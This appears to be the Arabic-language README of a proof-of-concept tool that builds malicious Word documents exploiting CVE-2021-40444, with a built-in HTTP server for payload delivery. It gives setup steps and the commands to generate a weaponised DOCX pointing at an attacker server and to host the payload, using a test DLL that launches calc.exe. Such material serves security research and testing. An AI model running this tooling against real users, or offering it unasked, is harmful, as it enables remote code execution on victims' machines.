
يُولِّد مستندات DOCX خبيثة تستغل CVE-2021-40444 (Microsoft Office Word RCE) مع خادم HTTP مدمج لتوصيل الحمولات، استنادًا إلى عينات تم هندستها عكسيًا من البرية.
أداة توليد مستندات docx خبيثة لاستغلال CVE-2021-40444 (تنفيذ الأوامر عن بُعد في Microsoft Office Word)
تم إنشاء هذا السكريبت بناءً على بعض الهندسة العكسية للعينة المستخدمة في البرية: 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 (ملف docx)
تحتاج إلى تثبيت lcab أولاً (sudo apt-get install lcab)
تحقق من REPRODUCE.md للحصول على خطوات إعادة الإنتاج اليدوية
إذا لم يعمل ملف cab الذي تم إنشاؤه، حاول توجيه رابط exploit.html إلى calc.cab
أولاً، قم بإنشاء مستند docx خبيث باستخدام DLL. يمكنك استخدام الملف الموجود في test/calc.dll والذي يقوم بتشغيل calc.exe من خلال استدعاء system()
python3 exploit.py generate test/calc.dll http://<SRV IP>

بعد إنشاء مستند docx الخبيث (سيكون في out/)، يمكنك إعداد الخادم:
sudo python3 exploit.py host 80

أخيرًا، جرب مستند docx في جهاز افتراضي يعمل بنظام ويندوز:
